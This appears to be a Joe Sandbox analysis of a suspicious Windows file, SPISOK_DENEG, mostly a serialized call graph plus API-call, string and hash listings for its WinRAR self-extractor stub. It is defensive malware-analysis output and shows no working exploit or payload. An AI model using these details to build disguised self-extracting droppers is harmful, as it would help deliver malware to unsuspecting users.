24657->24659 24658 ebc28 24794 df3fa 82 API calls 2 library calls 24658->24794 24727 eda52 24659->24727 24660->24607 24663 ebc3f MapViewOfFile 24663->24667 24664->24656 24668 ebcb7 Sleep 24664->24668 24666 ec73f 97 API calls 24670 ebe03 24666->24670 24667->24639 24668->24656 24668->24664 24669 ebe2c 24795 d12d3 GetDlgItem EnableWindow 24669->24795 24670->24669 24673 ec73f 97 API calls 24670->24673 24672->24517 24672->24541 24673->24669 24675 d131f 24674->24675 24676 d1378 24674->24676 24677 d1385 24675->24677 24800 de2e8 62 API calls 2 library calls 24675->24800 24801 de2c1 GetWindowLongW SetWindowLongW 24676->24801 24677->24510 24677->24511 24677->24590 24680 d1341 24680->24677 24681 d1354 GetDlgItem 24680->24681 24681->24677 24682 d1364 24681->24682 24682->24677 24683 d136a SetWindowTextW 24682->24683 24683->24677 24685 da0bb 24684->24685 24686 da175 24685->24686 24687 da14c 24685->24687 24802 da2b2 24685->24802 24686->24571 24686->24572 24687->24686 24688 da2b2 8 API calls 24687->24688 24688->24686 24690->24582 24692 d9678 24691->24692 24693 d96d5 CreateFileW 24692->24693 24694 d96c9 24692->24694 24693->24694 24695 d971f 24694->24695 24696 dbb03 GetCurrentDirectoryW 24694->24696 24695->24637 24697 d9704 24696->24697 24697->24695 24698 d9708 CreateFileW 24697->24698 24698->24695 24699->24616 24700->24629 24701->24645 24703 ec749 __EH_prolog 24702->24703 24704 ebdcf 24703->24704 24705 eb314 ExpandEnvironmentStringsW 24703->24705 24704->24657 24714 ec780 _wcslen _wcsrchr 24705->24714 24707 eb314 ExpandEnvironmentStringsW 24707->24714 24708 eca67 SetWindowTextW 24708->24714 24711 f3e3e 22 API calls 24711->24714 24713 ec855 SetFileAttributesW 24716 ec90f GetFileAttributesW 24713->24716 24726 ec86f __cftof _wcslen 24713->24726 24714->24704 24714->24707 24714->24708 24714->24711 24714->24713 24719 ecc31 GetDlgItem SetWindowTextW SendMessageW 24714->24719 24722 ecc71 SendMessageW 24714->24722 24823 e1fbb CompareStringW 24714->24823 24824 ea64d GetCurrentDirectoryW 
24714->24824 24826 da5d1 6 API calls 24714->24826 24827 da55a FindClose 24714->24827 24828 eb48e 76 API calls 2 library calls 24714->24828 24716->24714 24717 ec921 DeleteFileW 24716->24717 24717->24714 24720 ec932 24717->24720 24719->24714 24721 d4092 _swprintf 51 API calls 24720->24721 24723 ec952 GetFileAttributesW 24721->24723 24722->24714 24723->24720 24724 ec967 MoveFileW 24723->24724 24724->24714 24725 ec97f MoveFileExW 24724->24725 24725->24714 24726->24714 24726->24716 24825 db991 51 API calls 2 library calls 24726->24825 24728 eda5c __EH_prolog 24727->24728 24829 e0659 24728->24829 24730 eda8d 24833 d5b3d 24730->24833 24732 edaab 24837 d7b0d 24732->24837 24736 edafe 24853 d7b9e 24736->24853 24738 ebdee 24738->24666 24740 ed6a8 24739->24740 24741 ea5c6 4 API calls 24740->24741 24742 ed6ad 24741->24742 24743 ebf15 24742->24743 24744 ed6b5 GetWindow 24742->24744 24743->24518 24743->24519 24744->24743 24750 ed6d5 24744->24750 24745 ed6e2 GetClassNameW 25324 e1fbb CompareStringW 24745->25324 24747 ed76a GetWindow 24747->24743 24747->24750 24748 ed706 GetWindowLongW 24748->24747 24749 ed716 SendMessageW 24748->24749 24749->24747 24751 ed72c GetObjectW 24749->24751 24750->24743 24750->24745 24750->24747 24750->24748 25325 ea605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24751->25325 24753 ed743 25326 ea5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24753->25326 25327 ea80c 8 API calls 24753->25327 24756 ed754 SendMessageW DeleteObject 24756->24747 24757->24534 24759 eabcc 24758->24759 24765 eabf1 24758->24765 25328 e1fbb CompareStringW 24759->25328 24761 eabff 24766 eb093 24761->24766 24762 eabf6 SHAutoComplete 24762->24761 24763 eabdf 24764 eabe3 FindWindowExW 24763->24764 24763->24765 24764->24765 24765->24761 24765->24762 24767 eb09d __EH_prolog 24766->24767 24768 d13dc 84 API calls 24767->24768 24769 eb0bf 24768->24769 25329 d1fdc 24769->25329 24772 eb0eb 24775 d19af 128 API calls 24772->24775 24773 eb0d9 24774 d1692 86 API calls 24773->24774 24776 eb0e4 
24774->24776 24778 eb10d __InternalCxxFrameHandler ___std_exception_copy 24775->24778 24776->24558 24776->24560 24777 d1692 86 API calls 24777->24776 24778->24777 24779->24609 24781 eb568 5 API calls 24780->24781 24782 ed4e0 GetDlgItem 24781->24782 24783 ed536 SendMessageW SendMessageW 24782->24783 24784 ed502 24782->24784 24785 ed572 24783->24785 24786 ed591 SendMessageW SendMessageW SendMessageW 24783->24786 24789 ed50d ShowWindow SendMessageW SendMessageW 24784->24789 24785->24786 24787 ed5e7 SendMessageW 24786->24787 24788 ed5c4 SendMessageW 24786->24788 24787->24561 24788->24787 24789->24783 24790->24621 24791->24647 24792->24653 24793->24658 24794->24663 24795->24672 24796->24596 24797->24620 24798->24593 24799->24580 24800->24680 24801->24677 24803 da2bf 24802->24803 24804 da2e3 24803->24804 24805 da2d6 CreateDirectoryW 24803->24805 24806 da231 3 API calls 24804->24806 24805->24804 24809 da316 24805->24809 24807 da2e9 24806->24807 24808 da329 GetLastError 24807->24808 24811 dbb03 GetCurrentDirectoryW 24807->24811 24810 da325 24808->24810 24809->24810 24815 da4ed 24809->24815 24810->24685 24813 da2ff 24811->24813 24813->24808 24814 da303 CreateDirectoryW 24813->24814 24814->24808 24814->24809 24816 eec50 24815->24816 24817 da4fa SetFileAttributesW 24816->24817 24818 da53d 24817->24818 24819 da510 24817->24819 24818->24810 24820 dbb03 GetCurrentDirectoryW 24819->24820 24821 da524 24820->24821 24821->24818 24822 da528 SetFileAttributesW 24821->24822 24822->24818 24823->24714 24824->24714 24825->24726 24826->24714 24827->24714 24828->24714 24830 e0666 _wcslen 24829->24830 24857 d17e9 24830->24857 24832 e067e 24832->24730 24834 e0659 _wcslen 24833->24834 24835 d17e9 78 API calls 24834->24835 24836 e067e 24835->24836 24836->24732 24838 d7b17 __EH_prolog 24837->24838 24874 dce40 24838->24874 24840 d7b32 24841 eeb38 8 API calls 24840->24841 24842 d7b5c 24841->24842 24880 e4a76 24842->24880 24845 d7c7d 24846 d7c87 24845->24846 24848 d7cf1 24846->24848 24909 da56d 
24846->24909 24851 d7d50 24848->24851 24887 d8284 24848->24887 24849 d7d92 24849->24736 24851->24849 24915 d138b 74 API calls 24851->24915 24854 d7bac 24853->24854 24855 d7bb3 24853->24855 24856 e2297 86 API calls 24854->24856 24856->24855 24858 d17ff 24857->24858 24869 d185a __InternalCxxFrameHandler 24857->24869 24859 d1828 24858->24859 24870 d6c36 76 API calls __vswprintf_c_l 24858->24870 24861 d1887 24859->24861 24864 d1847 ___std_exception_copy 24859->24864 24863 f3e3e 22 API calls 24861->24863 24862 d181e 24871 d6ca7 75 API calls 24862->24871 24866 d188e 24863->24866 24864->24869 24872 d6ca7 75 API calls 24864->24872 24866->24869 24873 d6ca7 75 API calls 24866->24873 24869->24832 24870->24862 24871->24859 24872->24869 24873->24869 24875 dce4a __EH_prolog 24874->24875 24876 eeb38 8 API calls 24875->24876 24877 dce8d 24876->24877 24878 eeb38 8 API calls 24877->24878 24879 dceb1 24878->24879 24879->24840 24881 e4a80 __EH_prolog 24880->24881 24882 eeb38 8 API calls 24881->24882 24883 e4a9c 24882->24883 24884 d7b8b 24883->24884 24886 e0e46 80 API calls 24883->24886 24884->24845 24886->24884 24888 d828e __EH_prolog 24887->24888 24916 d13dc 24888->24916 24890 d82aa 24891 d82bb 24890->24891 25059 d9f42 24890->25059 24894 d82f2 24891->24894 24924 d1a04 24891->24924 25055 d1692 24894->25055 24897 d8389 24943 d8430 24897->24943 24901 d83e8 24951 d1f6d 24901->24951 24904 d83f3 24904->24894 24955 d3b2d 24904->24955 24967 d848e 24904->24967 24906 da56d 7 API calls 24907 d82ee 24906->24907 24907->24894 24907->24897 24907->24906 25063 dc0c5 CompareStringW _wcslen 24907->25063 24910 da582 24909->24910 24914 da5b0 24910->24914 25313 da69b 24910->25313 24912 da592 24913 da597 FindClose 24912->24913 24912->24914 24913->24914 24914->24846 24915->24849 24917 d13e1 __EH_prolog 24916->24917 24918 dce40 8 API calls 24917->24918 24919 d1419 24918->24919 24920 eeb38 8 API calls 24919->24920 24923 d1474 __cftof 24919->24923 24921 d1461 24920->24921 24922 db505 84 API calls 24921->24922 
24921->24923 24922->24923 24923->24890 24925 d1a0e __EH_prolog 24924->24925 24933 d1b9b 24925->24933 24938 d1a61 24925->24938 25064 d13ba 24925->25064 24927 d1bc7 25067 d138b 74 API calls 24927->25067 24930 d3b2d 101 API calls 24934 d1c12 24930->24934 24931 d1bd4 24931->24930 24931->24933 24932 d1c5a 24932->24933 24937 d1c8d 24932->24937 25068 d138b 74 API calls 24932->25068 24933->24907 24934->24932 24936 d3b2d 101 API calls 24934->24936 24936->24934 24937->24933 24941 d9e80 79 API calls 24937->24941 24938->24927 24938->24931 24938->24933 24939 d3b2d 101 API calls 24940 d1cde 24939->24940 24940->24933 24940->24939 24941->24940 24942 d9e80 79 API calls 24942->24938 25086 dcf3d 24943->25086 24945 d8440 25090 e13d2 GetSystemTime SystemTimeToFileTime 24945->25090 24947 d83a3 24947->24901 24948 e1b66 24947->24948 25095 ede6b 24948->25095 24952 d1f72 __EH_prolog 24951->24952 24954 d1fa6 24952->24954 25103 d19af 24952->25103 24954->24904 24956 d3b3d 24955->24956 24957 d3b39 24955->24957 24966 d9e80 79 API calls 24956->24966 24957->24904 24958 d3b4f 24959 d3b78 24958->24959 24960 d3b6a 24958->24960 25236 d286b 101 API calls 3 library calls 24959->25236 24962 d3baa 24960->24962 25235 d32f7 89 API calls 2 library calls 24960->25235 24962->24904 24964 d3b76 24964->24962 25237 d20d7 74 API calls 24964->25237 24966->24958 24968 d8498 __EH_prolog 24967->24968 24971 d84d5 24968->24971 24978 d8513 24968->24978 25261 e8c8d 103 API calls 24968->25261 24970 d84f5 24972 d851c 24970->24972 24973 d84fa 24970->24973 24971->24970 24976 d857a 24971->24976 24971->24978 24972->24978 25263 e8c8d 103 API calls 24972->25263 24973->24978 25262 d7a0d 152 API calls 24973->25262 24976->24978 25238 d5d1a 24976->25238 24978->24904 24979 d8605 24979->24978 25244 d8167 24979->25244 24982 d8797 24983 da56d 7 API calls 24982->24983 24986 d8802 24982->24986 24983->24986 24985 dd051 82 API calls 24990 d885d 24985->24990 25250 d7c0d 24986->25250 24987 d8992 24988 d8a5f 24987->24988 24993 d89e1 24987->24993 
24994 d8ab6 24988->24994 25005 d8a6a 24988->25005 24989 d898b 25266 d2021 74 API calls 24989->25266 24990->24978 24990->24985 24990->24987 24990->24989 25264 d8117 84 API calls 24990->25264 25265 d2021 74 API calls 24990->25265 24995 d8a4c 24993->24995 24997 da231 3 API calls 24993->24997 24999 d8b14 24993->24999 24994->24995 25269 d7fc0 97 API calls 24994->25269 24995->24999 25001 d8ab4 24995->25001 24996 d959a 80 API calls 24996->24978 25002 d8a19 24997->25002 25014 d8b82 24999->25014 25043 d9105 24999->25043 25270 d98bc 24999->25270 25000 d959a 80 API calls 25000->24978 25001->24996 25002->24995 25267 d92a3 97 API calls 25002->25267 25003 dab1a 8 API calls 25006 d8bd1 25003->25006 25005->25001 25268 d7db2 101 API calls 25005->25268 25009 dab1a 8 API calls 25006->25009 25024 d8be7 25009->25024 25012 d8b70 25274 d6e98 77 API calls 25012->25274 25014->25003 25015 d8cbc 25016 d8d18 25015->25016 25017 d8e40 25015->25017 25018 d8d8a 25016->25018 25021 d8d28 25016->25021 25019 d8e66 25017->25019 25020 d8e52 25017->25020 25040 d8d49 25017->25040 25028 d8167 19 API calls 25018->25028 25023 e3377 75 API calls 25019->25023 25022 d9215 123 API calls 25020->25022 25025 d8d6e 25021->25025 25032 d8d37 25021->25032 25022->25040 25026 d8e7f 25023->25026 25024->25015 25027 d8c93 25024->25027 25034 d981a 79 API calls 25024->25034 25025->25040 25277 d77b8 111 API calls 25025->25277 25280 e3020 123 API calls 25026->25280 25027->25015 25275 d9a3c 82 API calls 25027->25275 25031 d8dbd 25028->25031 25036 d8df5 25031->25036 25037 d8de6 25031->25037 25031->25040 25276 d2021 74 API calls 25032->25276 25034->25027 25279 d9155 93 API calls __EH_prolog 25036->25279 25278 d7542 85 API calls 25037->25278 25046 d8f85 25040->25046 25281 d2021 74 API calls 25040->25281 25042 d9090 25042->25043 25044 da4ed 3 API calls 25042->25044 25043->25000 25047 d90eb 25044->25047 25045 d903e 25256 d9da2 25045->25256 25046->25042 25046->25043 25046->25045 25282 d9f09 SetEndOfFile 25046->25282 25047->25043 
25283 d2021 74 API calls 25047->25283 25050 d9085 25052 d9620 77 API calls 25050->25052 25052->25042 25053 d90fb 25284 d6dcb 76 API calls 25053->25284 25056 d16a4 25055->25056 25300 dcee1 25056->25300 25060 d9f59 25059->25060 25061 d9f63 25060->25061 25312 d6d0c 78 API calls 25060->25312 25061->24891 25063->24907 25069 d1732 25064->25069 25066 d13d6 25066->24942 25067->24933 25068->24937 25070 d1748 25069->25070 25081 d17a0 __InternalCxxFrameHandler 25069->25081 25071 d1771 25070->25071 25082 d6c36 76 API calls __vswprintf_c_l 25070->25082 25073 d17c7 25071->25073 25078 d178d ___std_exception_copy 25071->25078 25075 f3e3e 22 API calls 25073->25075 25074 d1767 25083 d6ca7 75 API calls 25074->25083 25077 d17ce 25075->25077 25077->25081 25085 d6ca7 75 API calls 25077->25085 25078->25081 25084 d6ca7 75 API calls 25078->25084 25081->25066 25082->25074 25083->25071 25084->25081 25085->25081 25087 dcf4d 25086->25087 25089 dcf54 25086->25089 25091 d981a 25087->25091 25089->24945 25090->24947 25092 d9833 25091->25092 25094 d9e80 79 API calls 25092->25094 25093 d9865 25093->25089 25094->25093 25096 ede78 25095->25096 25097 de617 53 API calls 25096->25097 25098 ede9b 25097->25098 25099 d4092 _swprintf 51 API calls 25098->25099 25100 edead 25099->25100 25101 ed4d4 16 API calls 25100->25101 25102 e1b7c 25101->25102 25102->24901 25104 d19bf 25103->25104 25105 d19bb 25103->25105 25108 d9e80 79 API calls 25104->25108 25105->24954 25106 d19d4 25109 d18f6 25106->25109 25108->25106 25110 d1908 25109->25110 25111 d1945 25109->25111 25112 d3b2d 101 API calls 25110->25112 25117 d3fa3 25111->25117 25115 d1928 25112->25115 25115->25105 25118 d3fac 25117->25118 25119 d3b2d 101 API calls 25118->25119 25121 d1966 25118->25121 25134 e0e08 25118->25134 25119->25118 25121->25115 25122 d1e50 25121->25122 25123 d1e5a __EH_prolog 25122->25123 25142 d3bba 25123->25142 25125 d1e84 25126 d1732 78 API calls 25125->25126 25129 d1f0b 25125->25129 25127 d1e9b 25126->25127 25170 d18a9 78 API calls 
[Control-flow graph: serialized node/edge list of the rendered graph (block addresses, API names and call counts only). The drawing it encodes is not recoverable from the text dump; the per-function API call lists follow.]

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 000E0863: GetModuleHandleW.KERNEL32(kernel32), ref: 000E087C
                                                              • Part of subcall function 000E0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 000E088E
                                                              • Part of subcall function 000E0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 000E08BF
                                                              • Part of subcall function 000EA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 000EA655
                                                              • Part of subcall function 000EAC16: OleInitialize.OLE32(00000000), ref: 000EAC2F
                                                              • Part of subcall function 000EAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 000EAC66
                                                              • Part of subcall function 000EAC16: SHGetMalloc.SHELL32(00118438), ref: 000EAC70
                                                            • GetCommandLineW.KERNEL32 ref: 000EDF5C
                                                            • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 000EDF83
                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 000EDF94
                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 000EDFCE
                                                              • Part of subcall function 000EDBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 000EDBF4
                                                              • Part of subcall function 000EDBDE: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 000EDC30
                                                            • CloseHandle.KERNEL32(00000000), ref: 000EDFD7
                                                            • GetModuleFileNameW.KERNEL32(00000000,0012EC90,00000800), ref: 000EDFF2
                                                            • SetEnvironmentVariableW.KERNEL32(sfxname,0012EC90), ref: 000EDFFE
                                                            • GetLocalTime.KERNEL32(?), ref: 000EE009
                                                            • _swprintf.LIBCMT ref: 000EE048
                                                            • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 000EE05A
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 000EE061
                                                            • LoadIconW.USER32(00000000,00000064), ref: 000EE078
                                                            • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 000EE0C9
                                                            • Sleep.KERNEL32(?), ref: 000EE0F7
                                                            • DeleteObject.GDI32 ref: 000EE130
                                                            • DeleteObject.GDI32(?), ref: 000EE140
                                                            • CloseHandle.KERNEL32 ref: 000EE183
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                            • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                            • API String ID: 3049964643-3743209390
                                                            • Opcode ID: 1a871d011bc1df42c8d6956a92f734efcbb79b64cfdada497b02bd8a606ffb0a
                                                            • Instruction ID: bcdb8d498bcd6a9ab6bfe654c95152d9fcfab2d6c0e513097fb603ab92655618
                                                            • Opcode Fuzzy Hash: 1a871d011bc1df42c8d6956a92f734efcbb79b64cfdada497b02bd8a606ffb0a
                                                            • Instruction Fuzzy Hash: 17613B71904385BFD320AB76ED49FAB77ECEB08700F04442AF945A29D2DBB499C4C761
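The strings winrarsfxmappingfile.tmp and __tmp_rar_sfx_access_check_%u and the sfxcmd/sfxpar/sfxname/sfxstime environment variables that appear in these listings are the ones the WinRAR self-extractor module sets, so the code at 000D0000 is the SFX wrapper rather than the payload it unpacks. The Python below is an added triage helper, not part of the Joe Sandbox report or of the sample: it parses the report's bullet format (`Api.MODULE(args), ref: ADDR`, the `Part of subcall function` variant, and `String ID: a$b$c`) into records and flags the SFX traits a reviewer looks for: sfx* environment variables, the winrarsfxmappingfile.tmp mapping object, the STARTDLG/LICENSEDLG dialog templates, and ShellExecuteExW next to the `-el -s2 "-d%s" "-sp%s"` format string, a combination consistent with the stub relaunching itself. The names parse_listing, sfx_indicators and triage are this example's own; the embedded sample is a constructed subset of lines copied from this page's API listings.

```python
"""Triage helper for Joe Sandbox "APIs" / "String ID" listings.

Added example; not part of the Joe Sandbox report or of the analyzed sample.
It assumes only the bullet formats visible on the page:
    • Api.MODULE(arg,arg), ref: ADDR
    • Part of subcall function ADDR: Api.MODULE(arg), ref: ADDR
    • Api.MODULE ref: ADDR
    • String ID: s1$s2$s3
"""
import re
from dataclasses import dataclass
from typing import List, Optional

API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<subfn>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
STRING_ID_LINE = re.compile(r"^\s*(?:•\s*)?String ID:\s*(?P<strings>.*?)\s*$")


@dataclass
class ApiRef:
    api: str                          # e.g. OpenFileMappingW
    module: str                       # e.g. KERNEL32
    args: List[str]                   # raw tokens; '?' means the sandbox could not resolve it
    ref: int                          # address of the call site
    subcall_of: Optional[int] = None  # set when the line came from a called function


def parse_listing(text: str):
    """Split a listing into API references and 'String ID' strings; other lines are ignored."""
    refs: List[ApiRef] = []
    strings: List[str] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            sub = int(m["subfn"], 16) if m["subfn"] else None
            refs.append(ApiRef(m["api"], m["module"], args, int(m["ref"], 16), sub))
            continue
        m = STRING_ID_LINE.match(line)
        if m and m["strings"]:
            # Joe Sandbox joins the strings with '$'; a literal '$' inside a string
            # cannot be told apart from the separator, so this split is best effort.
            strings.extend(m["strings"].split("$"))
    return refs, strings


def sfx_indicators(refs: List[ApiRef], strings: List[str]) -> dict:
    """Flag the WinRAR SFX stub traits that the listing makes visible."""
    env_vars = sorted({r.args[0] for r in refs
                       if r.api == "SetEnvironmentVariableW" and r.args
                       and r.args[0].startswith("sfx")})
    mapping = any(r.api in ("OpenFileMappingW", "CreateFileMappingW")
                  and "winrarsfxmappingfile.tmp" in r.args for r in refs)
    dialogs = sorted({a for r in refs if r.api == "DialogBoxParamW"
                      for a in r.args if a.endswith("DLG")})
    # ShellExecuteExW together with the '-el -s2 "-d%s" "-sp%s"' format string is
    # consistent with the stub relaunching itself with directory and parameters.
    relaunch = (any(r.api == "ShellExecuteExW" for r in refs)
                and any("-el -s2" in s for s in strings))
    return {"sfx_env_vars": env_vars, "sfx_mapping": mapping,
            "dialogs": dialogs, "self_relaunch": relaunch}


def triage(text: str) -> dict:
    refs, strings = parse_listing(text)
    out = sfx_indicators(refs, strings)
    out["api_calls"] = len(refs)
    return out


# Constructed sample: a subset of lines copied from the API listings on this page.
SAMPLE = r"""
• Part of subcall function 000E0863: GetModuleHandleW.KERNEL32(kernel32), ref: 000E087C
• GetCommandLineW.KERNEL32 ref: 000EDF5C
• OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 000EDF83
• Part of subcall function 000EDBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 000EDBF4
• Part of subcall function 000EDBDE: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 000EDC30
• SetEnvironmentVariableW.KERNEL32(sfxname,0012EC90), ref: 000EDFFE
• SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 000EE05A
• DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 000EE0C9
• CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 000EBBD0
• ShellExecuteExW.SHELL32(0000003C), ref: 000EBC6F
• DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 000EC0BD
• String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
"""

if __name__ == "__main__":
    print(triage(SAMPLE))
```

On the sample every flag is set, which is what a stock SFX stub looks like and says nothing about the extracted payload; the point of separating the wrapper's API surface this way is to stop spending reversing time on WinRAR code and move to the dropped files the report lists elsewhere.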

                                                            Control-flow Graph

                                                            [Control-flow graph for the function at 000EA6C2 (FindResourceW, SizeofResource, LoadResource, LockResource, GlobalAlloc, GlobalLock, CreateStreamOnHGlobal, GdipCreateHBITMAPFromBitmap, GlobalUnlock, GlobalFree): the executed/not-executed colouring and edge layout are not recoverable from the text dump; the calls are listed under APIs below.]
                                                            APIs
                                                            • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,000EB73D,00000066), ref: 000EA6D5
                                                            • SizeofResource.KERNEL32(00000000,?,?,?,000EB73D,00000066), ref: 000EA6EC
                                                            • LoadResource.KERNEL32(00000000,?,?,?,000EB73D,00000066), ref: 000EA703
                                                            • LockResource.KERNEL32(00000000,?,?,?,000EB73D,00000066), ref: 000EA712
                                                            • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,000EB73D,00000066), ref: 000EA72D
                                                            • GlobalLock.KERNEL32(00000000), ref: 000EA73E
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 000EA762
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 000EA7C6
                                                              • Part of subcall function 000EA626: GdipAlloc.GDIPLUS(00000010), ref: 000EA62C
                                                            • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 000EA7A7
                                                            • GlobalFree.KERNEL32(00000000), ref: 000EA7CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                            • String ID: PNG
                                                            • API String ID: 211097158-364855578
                                                            • Opcode ID: 9edd0495b6bdf8133b58afa67d50ae4e2ac68abf9b5e0896fed66887700aa0ce
                                                            • Instruction ID: 566960ae3a95bb406616b5344e1f0f99a5a7ed7c689fc3462511838578c082ea
                                                            • Opcode Fuzzy Hash: 9edd0495b6bdf8133b58afa67d50ae4e2ac68abf9b5e0896fed66887700aa0ce
                                                            • Instruction Fuzzy Hash: 5A31A475604342AFC7109F22DC48D5BBFFDEF8E760B044518F99592A21EB71E9808A61

                                                            Control-flow Graph

                                                            [Control-flow graph for the function at 000DA69B (FindFirstFileW, GetLastError, FindNextFileW): the executed/not-executed colouring and edge layout are not recoverable from the text dump; the calls are listed under APIs below.]
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,000DA592,000000FF,?,?), ref: 000DA6C4
                                                              • Part of subcall function 000DBB03: _wcslen.LIBCMT ref: 000DBB27
                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,000DA592,000000FF,?,?), ref: 000DA6F2
                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,000DA592,000000FF,?,?), ref: 000DA6FE
                                                            • FindNextFileW.KERNEL32(?,?,?,?,?,?,000DA592,000000FF,?,?), ref: 000DA728
                                                            • GetLastError.KERNEL32(?,?,?,?,000DA592,000000FF,?,?), ref: 000DA734
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                            • String ID:
                                                            • API String ID: 42610566-0
                                                            • Opcode ID: 279c5f420eb1ecd262118f49495e8f86a5308daf20c4c9c22e88013105c8f919
                                                            • Instruction ID: 75d8673fb674d85fab5f2bfc18995978042df52e9a4b81c2e093832c9f34b5f1
                                                            • Opcode Fuzzy Hash: 279c5f420eb1ecd262118f49495e8f86a5308daf20c4c9c22e88013105c8f919
                                                            • Instruction Fuzzy Hash: 57419172A00655AFCB25DF64CC84AEAB7B8FB49350F104196F56DE3200D774AE94CFA1
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,?,000F7DC4,00000000,0010C300,0000000C,000F7F1B,00000000,00000002,00000000), ref: 000F7E0F
